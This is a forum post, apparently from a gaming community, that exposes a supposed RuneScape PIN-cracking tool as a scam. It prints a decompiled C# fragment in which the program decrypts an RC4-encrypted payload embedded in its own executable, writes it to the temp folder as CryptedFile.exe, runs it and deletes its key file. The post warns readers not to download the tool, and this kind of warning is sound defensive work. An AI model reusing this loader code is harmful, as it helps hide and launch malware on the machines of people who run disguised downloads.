Due to the fact that you have 1 post and recently joined also the other person who bumped joined recently also, it has come to my conclusion that you are puling off a scam. First of all, I don't think it is really possible to code a RSM PIN Code. Secondly, if you were to hack into Runescape's database, you would get into legal issues. Additionally, I have decompiled this and have look through the src. Here's a fragment of it
Code:
private void Form1_Load(object sender, EventArgs e)
{
StreamReader reader = new StreamReader("C:/Tmp745.DAT");
this.TextBox1.Text = reader.ReadToEnd();
reader.Close();
string tempPath = Path.GetTempPath();
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
string str = Strings.Space((int) FileSystem.LOF(1));
FileSystem.FileGet(1, ref str, -1L, false);
FileSystem.FileClose(new int[] { 1 });
string str2 = rc4(Strings.Split(str, "aJPF8g723e=dqNCtBJOPqNc2zACI0uvFfA3TX+Kz0xCIB", -1, CompareMethod.Binary)[1], this.TextBox1.Text);
FileSystem.FileOpen(5, tempPath + @"\CryptedFile.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1);
FileSystem.FilePut(5, str2, -1L, false);
FileSystem.FileClose(new int[] { 5 });
Process.Start(tempPath + @"\CryptedFile.exe");
string path = "C:/Tmp745.DAT";
if (File.Exists(path))
{
File.Delete(path);
}
this.Close();
ProjectData.EndApp();
}
Also if you look
here, it gives information about 'Cryptedfile.exe' .
DO NOT DOWNLOAD THIS
GG my friend . . . You are pwned and can't BS out of this situation.